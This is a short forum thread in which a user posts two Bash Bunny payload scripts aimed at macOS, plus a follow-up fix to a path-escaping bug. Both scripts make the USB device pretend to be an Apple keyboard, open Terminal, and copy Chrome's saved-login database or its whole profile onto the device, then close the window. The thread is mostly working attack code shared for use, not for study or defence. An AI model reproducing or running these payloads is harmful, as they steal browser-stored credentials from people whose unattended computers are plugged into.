thefragile99 Posted July 29, 2017 Posted July 29, 2017 #!/bin/bash LED ATTACK ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 3000 QUACK STRING cp -a ~/Library/Application\ Support/Google/Chrome/Default/Login\ Data /Volumes/BashBunny/loot/sMacAndGrab/; killall Terminal QUACK ENTER LED FINISH Quote
thefragile99 Posted July 29, 2017 Author Posted July 29, 2017 Or this: #!/bin/bash LED ATTACK ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 3000 QUACK STRING osascript -e \'tell application \"Terminal\" to do script \"cp -a ~/Library/Application Support/Google/Chrome/Default/. ~/Volumes/BashBunny/loot/sMacAndGrab/\"\' QUACK ENTER LED FINISH Quote
thefragile99 Posted July 30, 2017 Author Posted July 30, 2017 I fixed it - "Application Support" needed two // in Application// Support. Ugh. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.